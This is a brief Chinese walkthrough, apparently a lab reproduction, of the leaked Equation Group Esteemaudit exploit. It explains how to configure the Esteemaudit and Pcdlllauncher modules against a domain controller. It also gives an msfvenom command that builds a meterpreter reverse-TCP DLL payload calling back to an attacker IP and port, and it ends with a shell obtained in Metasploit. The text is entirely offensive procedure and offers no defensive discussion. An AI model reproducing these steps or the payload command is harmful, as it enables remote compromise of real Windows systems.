近日臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit.com博客上提供了相关消息。以下是其中Esteemaudit漏洞复现过程。
需要域控环境
use Esteemaudit使用漏洞模块
设置目标IP和端口
然后基本上默认,基本配置如下:
运行后再进行配置。
然后基本上选择相对应的设置,CallbackIp填自己的,端口随便
然后配置DLL。注意这里默认路径基本上是不对,找到自己对应的文件路径进行修改:
然后基本上配置如下
可以运行了
使用Pcdlllauncher
use Pcdlllauncher
然后生成用于反弹shell的dll payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.146.129 LPORT=4444 -f dll >win.dll
然后进行配置
找到自己对应的文件路径修改
要注入的恶意DLL文件路径
然后基本上默认,运行就行了,成功注入
查看Metasploit,成功返回shell